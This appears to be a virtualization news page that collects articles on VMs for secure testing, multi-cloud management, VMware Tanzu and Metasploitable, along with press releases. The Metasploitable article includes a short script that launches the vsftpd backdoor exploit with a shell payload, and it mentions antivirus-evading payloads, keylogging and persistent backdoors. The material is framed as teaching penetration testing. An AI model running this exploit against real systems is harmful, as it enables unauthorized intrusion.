Do You Need to Back Up Hyper-V Virtual Machines?

Today's business-critical workloads are more technology-driven than ever before. Virtualization allows organizations to make full use of the powerful physical server hardware available to them. Microsoft's Hyper-V hypervisor has matured in leaps and bounds over the last several releases and continues to gain popularity. With the Storage Spaces Direct technology introduced in Windows Server 2016 and carried forward in Windows Server 2019, organizations now have a robust software-defined storage architecture on which to run production workloads.

Spotlight

Nexius

Nexius is unique in combining Technology Services, Software (big data analytics), and Network Engineering and Deployment to provide its clients with full network life cycle expertise. Through software automation and self-performance, Nexius is accelerating its clients’ network technology evolution. As a top-tier OCP member, founding member of TIP, and contributor to the open source IP ecosystem, Nexius is also accelerating the virtualization of networks through agile development, testing, and operational support of network functions.

OTHER ARTICLES
Server Hypervisors

VM Applications for Software Development and Secure Testing

Article | May 18, 2023

Contents

1. Introduction
2. Software Development and Secure Testing
3. Using VMs in Software Development and Secure Testing
4. Conclusion

1. Introduction

"Testing is an infinite process of comparing the invisible to the ambiguous in order to avoid the unthinkable happening to the anonymous." —James Bach

Testing software is crucial for identifying and fixing security vulnerabilities. Meeting quality standards for functionality and performance does not, by itself, guarantee security. Software testing is therefore essential for identifying and addressing application security vulnerabilities in order to maintain:

Security of data history, databases, information, and servers
Customers' integrity and trust
Web application protection from future attacks

VMs provide a flexible, isolated environment for software development and security testing. They make it easy to replicate complex configurations and testing scenarios, allowing efficient issue resolution. VMs also support secure testing by isolating applications from the host system and enabling a reset to a previous state. In addition, they facilitate DevOps practices and streamline the development workflow.

2. Software Development and Secure Testing

Software Secure Testing: The Approach

The following approaches should be considered when preparing and planning security tests:

Architecture Study and Analysis: Understand whether the software meets the necessary requirements.
Threat Classification: List all potential threats and risk factors that must be tested.
Test Planning: Run the tests based on the identified threats, vulnerabilities, and security risks.
Testing Tool Identification: Identify the security testing tools relevant to the software's specific use cases.
Test-Case Execution: After a security test reveals an issue, fix it, either with suitable open-source code or manually.
Reports: Prepare a detailed report of the security tests performed, listing the vulnerabilities and threats found, the issues resolved, and those still pending.

Ensuring the security of an application that handles essential functions is paramount. This may involve safeguarding databases against malicious attacks or implementing fraud detection mechanisms for incoming leads before integrating them into the platform. Security must be maintained throughout the software development life cycle (SDLC) and kept at the forefront of developers' minds while implementing the software's requirements. With consistent effort, the SDLC pipeline addresses security issues before deployment, reducing the risk of discovering vulnerabilities in the deployed application and minimizing the damage they could cause.

A secure SDLC makes developers responsible for critical security, so they need to be aware of potential security concerns at each step of the process. This requires integrating security into the SDLC in ways that were not needed before. Because anyone can potentially access source code, coding with potential vulnerabilities in mind is essential, and a robust, secure SDLC process is critical to ensuring applications are not open to attack.

3. Using VMs in Software Development and Secure Testing

Snapshotting: Snapshotting allows developers to capture a VM's state at a specific point in time and restore it later. This feature is helpful for debugging and enables developers to roll back to a previous state when an error occurs. A virtual machine provides several operations for creating and managing snapshots and snapshot chains: users can create snapshots, revert to any snapshot in the chain, and remove snapshots, and extensive snapshot trees can be built to streamline the workflow. (A minimal scripted sketch follows.)
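Since this page opens with Hyper-V, here is a minimal sketch of scripted checkpoint management, assuming a Windows host with the Hyper-V PowerShell module available; the VM name "DevVM" and the Python-via-PowerShell route are illustrative assumptions, not part of the original article:

```python
# Minimal sketch: create, list, and restore Hyper-V checkpoints from Python
# by shelling out to the Hyper-V PowerShell module. Assumes a Windows host
# with Hyper-V installed and a VM named "DevVM" (illustrative name).
import subprocess

VM = "DevVM"  # hypothetical VM name

def ps(command: str) -> str:
    """Run a PowerShell command and return its stdout."""
    result = subprocess.run(
        ["powershell", "-NoProfile", "-Command", command],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

# Capture the VM's state before a risky test run.
ps(f"Checkpoint-VM -Name '{VM}' -SnapshotName 'pre-test'")

# Inspect the snapshot chain.
print(ps(f"Get-VMSnapshot -VMName '{VM}' | Format-Table Name, CreationTime"))

# Roll back if the test corrupted the environment.
ps(f"Restore-VMSnapshot -VMName '{VM}' -Name 'pre-test' -Confirm:$false")

# Remove the checkpoint once it is no longer needed.
ps(f"Remove-VMSnapshot -VMName '{VM}' -Name 'pre-test'")
```

Note that checkpoints are a convenience for test workflows, not a substitute for proper VM backups.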
Virtual Networking: Virtual networking allows VMs to be connected to virtual networks that simulate complex network topologies, so developers can test their applications in different network environments. It also allows data centers to span multiple physical locations and gives administrators access to a wealth of more efficient options, letting them modify the network as requirements change without additional hardware. Moreover, provisioning networks for specific applications and needs offers greater flexibility, and workloads can be moved seamlessly across the network infrastructure without compromising service, security, or availability.

Resource Allocation: VMs can be configured with specific resource allocations for CPU, RAM, and storage, allowing developers to test their applications under different resource constraints. Maintaining a 1:1 ratio between virtual machine processors and host cores is highly recommended: over-subscribing virtual processors to a single core can lead to stalled or delayed events, causing significant frustration among users. In practice, however, IT administrators do overallocate virtual processors. In such cases, a pragmatic approach is to start with a 2:1 ratio and move gradually toward 4:1, 8:1, 12:1, and so on as virtual allocation is brought into the IT infrastructure, ensuring a safe and measured transition toward optimized virtual resource allocation. (The sketch below illustrates this ratio check.)
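As a quick illustration of the ratio arithmetic above, here is a minimal, self-contained helper; the host core and vCPU counts are made-up examples:

```python
# Minimal sketch: checking a vCPU:pCPU over-subscription ratio against a
# chosen ceiling, as described above. The ceiling values mirror the
# article's illustrative ratios (1:1, 2:1, 4:1, ...), not vendor guidance.
def oversubscription_ratio(total_vcpus: int, physical_cores: int) -> float:
    """Return the virtual-to-physical CPU ratio for a host."""
    if physical_cores <= 0:
        raise ValueError("physical_cores must be positive")
    return total_vcpus / physical_cores

def within_ceiling(total_vcpus: int, physical_cores: int,
                   ceiling: float = 2.0) -> bool:
    """True if the host stays at or under the chosen ratio ceiling."""
    return oversubscription_ratio(total_vcpus, physical_cores) <= ceiling

# Example: 48 vCPUs allocated on a 16-core host is a 3:1 ratio,
# over a conservative 2:1 ceiling but under a 4:1 one.
ratio = oversubscription_ratio(48, 16)
print(f"ratio = {ratio:.1f}:1, within 2:1? {within_ceiling(48, 16, 2.0)}")
```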
Containerization within VMs: Containerization within VMs provides an additional layer of isolation and security for applications. Enterprises are finding new use cases for VMs that leverage in-house and cloud infrastructure to support heavy-duty application and networking workloads, which can also have a positive impact on the environment. DevOps teams combine containerization with virtualization to improve software development flexibility: containers package an application with the components it needs, such as code, system tools, and libraries. For complex applications, virtual machines and containers are used together, with containers typically serving the front end and middleware while VMs serve the back end.

VM Templates: VM templates are pre-configured virtual machines that serve as a base for creating new ones, making it easier to set up development and testing environments. A template is a master-copy image of a virtual machine that includes VM disks, virtual devices, and settings, and it can be cloned multiple times. Clones created from a template are independent and not linked to it. Templates are handy when a large number of similar VMs must be deployed, and they preserve VM consistency. To edit a template, convert it to a VM, make the necessary changes, and then convert the edited VM back into a new template.

Remote Access: VMs can be accessed remotely, allowing developers and testers to collaborate effectively from anywhere in the world. To manage a virtual machine remotely, enable remote access, connect to the virtual machine, and then open its VNC or serial console; once connected, the user is granted full permission to manage the VM. Remote access is secure, since connections can be encrypted and authenticated to prevent unauthorized access, and it simplifies administration by letting administrators monitor and control virtual machines from a central location.

DevOps Integration: DevOps is a collection of practices, principles, and tools that allow a team to release software quickly and efficiently. Virtualization is vital in DevOps when developing intricate cloud, API, and SOA systems: virtual machines let teams simulate environments for creating, testing, and launching code while conserving computing resources, and they suit test-driven development (TDD) well when a bug hunt begins at the API layer. With virtualization providers handling updates, DevOps teams are freed to focus on other areas, increasing productivity by 50–60%. In addition, VMs allow simultaneous testing of multiple release and patch levels, improving product compatibility and interoperability.

4. Conclusion

The outlook for virtual machine applications in development and testing is highly promising. As development and testing processes grow more complex, VMs can significantly simplify and streamline these operations, and they are expected to become even more versatile and powerful, offering developers and testers a broader range of tools and capabilities. One potential future development is the integration of machine learning and artificial intelligence into VMs, enabling them to automate tasks, optimize resource allocation, and generate recommendations based on performance data. VMs may also become more agile and lightweight, letting developers and testers spin instances up and down more efficiently. With continued innovation, VM applications for software development and security testing should keep providing ever more powerful and flexible tools to improve the software development process.

Read More
Virtual Desktop Strategies

Managing Multi-Cloud Complexities for a Seamless Experience

Article | July 26, 2022

Introduction

The early 2000s were milestone moments for the cloud: Amazon Web Services (AWS) entered the market in 2006, while Google revealed its first cloud service in 2007. Fast forward to 2020, when the pandemic accelerated digital transformation efforts by around seven years (according to McKinsey), and the cloud has become a commercial necessity today. It not only facilitated the swift transition to remote work, but it also remains critical to company sustainability and creativity. Many would argue that the large-scale transition to the cloud in the 2010s was necessary to enable the digital-first experiences that remote workers and decentralized businesses need today.

Multi-cloud and hybrid cloud setups are now the norm. According to Gartner, most businesses today use a multi-cloud approach to reduce vendor lock-in or to take advantage of more flexible, best-of-breed solutions. However, managing multi-cloud systems increases cloud complexity and IT concerns, frequently slowing rather than accelerating innovation. According to 2022 research by IntelligentCIO, the average multi-cloud system includes five platforms, including AWS, Microsoft Azure, Google Cloud, and IBM Red Hat, among others.

Managing Multi-Cloud Complexities Like a Pro

Your multi-cloud strategy should satisfy your company's requirements while laying the groundwork for managing various cloud deployments. Creating a proactive plan for managing multi-cloud setups is one of the practices that can distinguish your company. Strategies for handling multi-cloud complexity are outlined below.

Managing Data with AI and ML: AI and machine learning can help manage the enormous quantities of data in multi-cloud environments. AI simulates human decision-making and performs tasks as well as humans, or at times even better; machine learning is a type of AI that learns from data, recognizes patterns, and makes decisions with minimal human interaction. Together they help surface the most important data, reducing big-data and multi-cloud complexity while enabling simplicity and better data control. (A brief sketch after this list illustrates the idea.)

Integrated Management Structure: Keeping up with the growing number of cloud services from several providers requires a unified management structure; juggling and correlating infrastructure alternatives across multiple clouds consumes IT time, resources, and technology. Routinely monitor your cloud resources and service settings, manage apps, clouds, and people globally, and ensure you have the technology and infrastructure to handle several clouds.

Developing a Security Strategy: Operating multiple clouds requires a security strategy and seamless integration of security capabilities. There is no single right answer, since vendors have varied policies and cybersecurity methods. Storing data across multiple cloud deployments guards against data loss, so handling backups and safety copies of your data is crucial. Regularly examine your multi-cloud network's security: the cyber-threat environment will change as infrastructure and software do, and multi-cloud strategies must safeguard both data and applications.

Skillset Management: Multi-cloud complexity requires skilled operators. Do you have the appropriate IT personnel to handle multi-cloud, and if not, can you use managed or cloud services? These people are responsible for teaching the organization how each cloud deployment helps the company accomplish its goals, and these specialists ensure all cloud entities work properly by utilizing cloud technologies.
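To make the AI/ML point above concrete, here is a minimal, hypothetical sketch that flags anomalous usage records gathered across cloud platforms using scikit-learn's Isolation Forest; the metric columns, sample counts, and thresholds are invented for illustration only:

```python
# Minimal, hypothetical sketch: flagging anomalous multi-cloud usage
# records with an Isolation Forest so operators review only the outliers.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
normal = rng.normal(50, 5, size=(500, 2))  # e.g. hourly (CPU %, egress GB) samples
spikes = rng.normal(95, 2, size=(5, 2))    # a handful of unusual readings
metrics = np.vstack([normal, spikes])

clf = IsolationForest(contamination=0.01, random_state=0).fit(metrics)
flags = clf.predict(metrics)               # -1 marks an anomaly

print(f"{(flags == -1).sum()} anomalous samples flagged for review")
```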
Closing Lines

Traditional cloud monitoring solutions cannot cope with dynamic multi-cloud setups, but automated intelligence can get to the heart of cloud performance and security concerns. To begin with, businesses need end-to-end observability in order to see the overall picture. Add automation and causal AI to that capability, and teams can obtain the accurate answers they need to optimize their environments, freeing them to concentrate on increasing innovation and generating better business results.

Read More
VMware, vSphere, Hyper-V

Addressing Multi-Cloud Complexity with VMware Tanzu

Article | May 2, 2023

Introduction

With cloud computing on the path to becoming the mother of all transformations, particularly in IT's ways of development and operations, we are once again confronted with the problem of conversion errors, this time a hundredfold greater than in previous moves to dispersed computing and the web. While the issue is evident, the remedies are not so obvious. Cloud complexity is the outcome of the rapid acceleration of cloud migration and net-new innovation without consideration of the complexity this introduces into operations.

Almost all businesses already work in a multi-cloud or hybrid-cloud environment; according to an IDC report, 93% of enterprises utilize multiple clouds. The decision may have stemmed from a desire to save money and avoid vendor lock-in or to increase resilience, or businesses might simply have found themselves with several clouds as a result of the compounding activities of different teams. When it comes to strategic technology choices, relatively few businesses begin by asking, "How can we secure and control our technology?"

Must-Follow Methods for Multi-Cloud and Hybrid Cloud Success

Data Analysis at Any Size, from Any Source: To proactively recognize issues, raise alerts, and guide investigations, teams should be able to utilize all data across the cloud and on-premises.

Insights in Real Time: Given the ephemeral nature of containerized operations and functions as a service, businesses cannot wait minutes to determine whether they are experiencing infrastructure difficulties. Only a scalable streaming architecture can ingest, analyze, and alert rapidly enough to discover and investigate problems before they have a major impact on consumers.

Analytics That Enable Teams to Act: Because multi-cloud and hybrid-cloud strategies do not belong to a single team, businesses must be able to evaluate data within and across teams in order to make decisions and act swiftly.

How Can VMware Help in Solving Multi-Cloud and Hybrid-Cloud Complexity?

VMware has made several announcements indicating a new strategy focused on modern applications. The approach centers on two VMware products: vSphere with Kubernetes and Tanzu. Since then, much has been said about VMware's modern-app approach, and several products have launched. Let's focus on VMware Tanzu.

VMware Tanzu

Tanzu is a product that enables organizations to upgrade both their apps and the infrastructure that supports them. In the same way that VMware wants vRealize to be known for cloud management and automation, it wants Tanzu to be known for modern business applications. Tanzu uses Kubernetes to build and manage modern applications, with a single development environment and a single deployment process, and it is compatible with both private and public cloud infrastructures.

Closing Lines

The important point is that the Tanzu portfolio offers a great deal of flexibility in terms of where applications run and how they are controlled. We observe increasing demand for running an application on any cloud, and VMware Tanzu helps streamline multi-cloud operation for the MLOps pipeline. Beyond multi-cloud operation, it is critical to monitor and alert on each component throughout the MLOps lifecycle, from Kubernetes pods and inference services to data and model performance.

Read More
Virtual Desktop Tools, Server Hypervisors

Metasploitable: A Platform for Ethical Hacking and Penetration Testing

Article | June 8, 2023

Contents

1. Overview
2. Ethical Hacking and Penetration Testing
3. Metasploit Penetration Test
4. Why Choose Metasploit Framework for Your Business?
5. Closing Remarks

1. Overview

Metasploitable is an intentionally vulnerable virtual machine that enables the learning and practice of Metasploit, one of the best penetration testing frameworks for helping businesses discover and shore up their systems' vulnerabilities before hackers exploit them. Security engineers use Metasploit both as a penetration testing system and as a development platform for creating security tools and exploits. Metasploit's various user interfaces, libraries, tools, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it at the target system. In addition, Metasploit's extensive database houses hundreds of exploits and several payload options.

2. Ethical Hacking and Penetration Testing

An ethical hacker works within a security framework and checks for bugs that a malicious hacker might use to exploit networks, applying experience and skill to secure the cyber environment. Ethical hacking is essential to protecting infrastructure from the threats hackers pose; its main purpose is to assess the safety of the targeted systems and networks and report the findings to the owner. Ethical hacking uses penetration test techniques to evaluate security loopholes, including:

Information gathering
Vulnerability scanning
Exploitation
Test analysis

Ethical hacking relies on automated methods, since hacking without automated software is inefficient and time-consuming. Among the many tools and methods available for ethical hacking and penetration testing, the Metasploit framework eases the effort of exploiting vulnerabilities in networks, operating systems, and applications, and of generating new exploits for new or unknown vulnerabilities.

3. Metasploit Penetration Test

Reconnaissance: Integrate Metasploit with various reconnaissance tools to find the vulnerable spot in the system.

Threat Modeling and Vulnerability Identification: Once a weakness is identified, choose an exploit and payload for penetration.

Exploitation: If the exploit (a tool used to take advantage of a system weakness) succeeds, the payload gets executed at the target, and the user gets a shell for interacting with it (a shellcode is a small piece of code used as the payload). The most popular payload for attacking Windows systems is Meterpreter, an in-memory-only interactive shell that lets the attacker explore the target machine and execute code. Other payloads are:

Static payloads (enable port forwarding and communications between networks)
Dynamic payloads (allow testers to generate unique payloads to evade antivirus software)
Command shell payloads (enable users to run scripts or commands against a host)

Post-Exploitation: Once on the target machine, Metasploit offers various tools for privilege escalation, packet sniffing, keylogging, screen capture, and pivoting.

Resolution and Re-Testing: Users set up a persistent backdoor in case the target machine gets rebooted.

These features make Metasploit easy to configure to the user's requirements. (A minimal scripted walk-through of this flow appears below.)
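As a concrete illustration of the exploit-plus-payload flow described above, here is a minimal sketch driving Metasploit over its RPC interface with the pymetasploit3 library, aimed at the classic vsftpd backdoor on a Metasploitable 2 lab host. The RPC password, host address, and the use of pymetasploit3 itself are assumptions for illustration, and msfrpcd must already be running:

```python
# Minimal sketch: configure an exploit module, pair it with a payload, and
# launch it via Metasploit's RPC API using pymetasploit3 (assumed installed,
# with msfrpcd started beforehand, e.g.: msfrpcd -P s3cr3t -S).
from pymetasploit3.msfrpc import MsfRpcClient

client = MsfRpcClient('s3cr3t', ssl=False)  # hypothetical RPC password

# Classic Metasploitable 2 target: the vsftpd 2.3.4 backdoor.
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.56.101'        # hypothetical lab-only address

payload = client.modules.use('payload', 'cmd/unix/interact')

# Launch the exploit; a session appears in client.sessions.list on success.
exploit.execute(payload=payload)
for session_id, info in client.sessions.list.items():
    print(session_id, info.get('via_exploit'))
```

Run this only against lab machines you own, such as a Metasploitable VM on an isolated host-only network.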
4. Why Choose Metasploit Framework for Your Business?

Significant advantages of the Metasploit Framework are discussed below:

Open Source: The Metasploit Framework is actively developed as open-source software, so many companies prefer it as a foundation for growing their businesses.
Easy Usage: It is very easy to use, with an intuitive naming convention for its commands, which facilitates building extensive penetration tests of the network.
GUI Environment: It offers friendly third-party interfaces that ease penetration testing projects with facilities such as button clicks, on-the-fly vulnerability management, and easy-to-switch workspaces, among others.
Cleaner Exits: Metasploit can exit cleanly without detection, even if the target system does not restart after a penetration test. It also offers various options for maintaining persistent access to the target system.
Easy Switching Between Payloads: Metasploit allows testers to change payloads easily with the 'set payload' command, offering flexibility for system penetration through shell-based access or Meterpreter.

5. Closing Remarks

From DevSecOps experts to hackers, everyone uses the Ruby-based open-source framework Metasploit, which allows testing via command-line alterations or a GUI, and Metasploitable is a vulnerable virtual machine ideally suited to ethical hacking and penetration testing in VM security. One trend likely to shape Metasploitable's future is the increasing use of cloud-based environments for testing and production: Metasploitable could be adapted to work in cloud environments, or new tools may be developed specifically for cloud-based penetration testing. Another is the growing importance of automation in security testing, which Metasploitable could address by including more automation features. The future of Metasploitable looks bright as it continues to be a valuable tool for security professionals and enthusiasts, and as the security landscape evolves, it will be interesting to see how Metasploitable adapts to meet the community's changing needs.

Read More


Related News

Virtualized Environments

VeriSilicon Unveils the New VC9800 IP for Next Generation Data Centers

Business Wire | January 09, 2024

VeriSilicon today unveiled its latest VC9800 series Video Processor Unit (VPU) IP, with enhanced video processing performance to strengthen its presence in data center applications. The newly launched IP series caters to the advanced requirements of next-generation data centers, including video transcoding servers, AI servers, virtual cloud desktops, and cloud gaming.

The VC9800 series VPU IP delivers high performance, high throughput, and server-grade multi-stream encoding and decoding. It can handle up to 256 streams and supports all mainstream video formats, including the new advanced format VVC. Through Rapid Look Ahead encoding, the VC9800 series improves video quality significantly while keeping memory footprint and encoding latency low. Capable of 8K encoding and decoding, it offers enhanced video post-processing and multi-channel encoding at various resolutions, achieving an efficient transcoding solution.

The VC9800 series VPU IP can seamlessly interface with Neural Network Processor (NPU) IP, enabling a complete AI-video pipeline. Combined with VeriSilicon's Graphics Processor Unit (GPU) IP, the subsystem solution can deliver enhanced gaming experiences. In addition, the hardware virtualization, super-resolution image enhancement, and AI-enabled encoding functions of this IP series also offer effective solutions for virtual cloud desktops.

"VeriSilicon's advanced video transcoding technology continues leading in Data Center domain. We are working closely with global leading customers to develop comprehensive video processing subsystem solutions to meet the requirements of the latest Data Centers," said Wei-Jin Dai, Executive VP and GM of IP Division of VeriSilicon. "For AI computing, our video post-processing capabilities have been extended to smoothly interact with NPUs, ensuring OpenCV-level accuracy. We've also introduced super resolution technology to the video processing subsystem, elevating image quality and ultimately enhancing user experiences for cloud computing and smart display."

About VeriSilicon

VeriSilicon is committed to providing customers with platform-based, all-around, one-stop custom silicon services and semiconductor IP licensing services leveraging its in-house semiconductor IP.

Read More

Server Virtualization

Panasonic Automotive Introduces Neuron High-Performance Compute (HPC) to Advance to a Software-Defined Mobility Future

PR Newswire | January 09, 2024

Panasonic Automotive Systems Company of America, a tier-one automotive supplier and a division of Panasonic Corporation of North America, announced its High-Performance Compute (HPC) system. Named Neuron, this innovation addresses the rapidly evolving mobility needs anticipated for software-defined vehicle advancements.

As vehicles become more software-reliant, vehicle systems must support an extended software lifecycle by enabling software upgrades and prolonging the capability of the supporting hardware. Cars rely on hardware and software compute platforms to process, share, sense, and derive insights to handle functions for assisted driving. Panasonic Automotive's Neuron HPC allows for not only software updates and upgrades but also hardware upgrades across platform lifecycles. The Neuron HPC can aggregate multiple computing zones to reduce the cost, weight, and integration complexity of the vehicle by removing redundant components. Panasonic Automotive's design supports effortless up-integration with high performance and heavy data-input processing capability. Importantly, the design is upgradeable, scalable, and future-proof across today's evolving in-vehicle platforms.

Neuron HPC Architecture & Design

Panasonic Automotive's High-Performance Compute architecture could reduce the number of distributed electronic control units (ECUs) by up to 80%, allowing for faster, lighter, cross-domain computing for real-time, cross-functional communications. The Neuron HPC design is suited for any mobility platform, including internal combustion engine, hybrid, fuel cell, or electric vehicles.

"In collaboration with OEMs, Panasonic Automotive has designed and met some of the largest central compute platform challenges in the industry in order to make the driving experience evolve with technology," said Andrew Poliak, CTO, Panasonic Automotive Systems Company of America. "Neuron maximizes performance, safety and innovation over the entire ownership of the consumer's vehicle and enables OEMs with a future-proof SDV platform for ensuing generations of mobility needs."

Key Systems, UX Features & Technical Benefits

With a streamlined design, the Neuron HPC incorporates up-integration capability by consolidating multiple ECUs into one centralized nucleus to handle all levels of ADAS, chassis, body, and in-cabin infotainment features.

About Panasonic Automotive Systems Company of America

Panasonic Automotive Systems Company of America is a division of Panasonic Corporation of North America and a leading global supplier of automotive infotainment and connectivity system solutions. It acts as the North American affiliate of Panasonic Automotive Systems Co., Ltd., which coordinates the global automotive business. Panasonic Automotive Systems Company of America is headquartered in Peachtree City, Georgia, with sales, marketing, and engineering operations in Farmington Hills, Mich.

About Panasonic Corporation of North America

Newark, NJ-based Panasonic Corporation of North America is committed to creating a better life and a better world by enabling its customers through innovations in Sustainable Energy, Immersive Entertainment, Integrated Supply Chains and Mobility Solutions. The company is the principal North American subsidiary of Osaka, Japan-based Panasonic Corporation. One of Interbrand's Top 100 Best Global Brands of 2023, Panasonic is a leading technology partner and integrator to businesses, government agencies and consumers across the region.

Read More

Server Virtualization

AELF Partners with ChainsAtlas to Pioneer Interoperability in Blockchain

PR Newswire | January 09, 2024

aelf is advancing cross-chain interoperability through a strategic partnership with ChainsAtlas. By utilising ChainsAtlas' innovative virtualisation technology, aelf will enable decentralised applications (dApps) from diverse blockchains to seamlessly migrate to and integrate with the aelf blockchain, regardless of the dApps' smart contract specifications. This collaboration marks a significant step towards a globally interconnected and efficient blockchain ecosystem, breaking down the silos between blockchains.

Khaniff Lau, Business Development Director at aelf, shares, "The strategic partnership with ChainsAtlas is a significant step towards realising our vision of a seamlessly interconnected blockchain world. With this integration, aelf is set to become a hub for cross-chain activities, enhancing our ability to support a wide array of dApps, digital assets, and Web2 apps. This collaboration is not just about technology integration; it's about shaping the future of how services and products on blockchains interact and operate in synergy."

Jan Hanken, Co-founder of ChainsAtlas, says, "ChainsAtlas was always built to achieve two major goals: to make blockchain development accessible to a broad spectrum of developers and entrepreneurs and, along that path, to pave the way for a truly omnichain future." "By joining forces with aelf, we are bringing that visionary future much closer to reality. As we anticipate the influx of creativity from innovators taking their first steps into the world of Web3 on aelf, driven by ChainsAtlas technology, we are excited to see these groundbreaking ideas come to life," adds Hanken.

The foundation for true cross-chain interoperability is being laid as aelf integrates ChainsAtlas' Virtualization Unit (VU), enabling the aelf blockchain to accommodate both EVM and non-EVM digital assets. This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, which allows aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas while establishing state-transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains.

Through this partnership, the aelf blockchain's capabilities will be enhanced to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will be empowered to build on the aelf blockchain. The partnership will also foster increased engagement within the Web3 community, as users gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains.

About aelf

aelf is a high-performance Layer 1 blockchain featuring multi-sidechain technology for unlimited scalability, designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS (aelf's variation of a Delegated Proof-of-Stake consensus protocol), parallel processing, peer-to-peer (P2P) network communication, cross-chain bridges, and a dynamic sidechain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates building, integrating, and deploying smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network, and aelf remains committed to fostering innovation within its ecosystem and driving the development of Web3 and the adoption of blockchain technology.

About ChainsAtlas

ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.

Read More
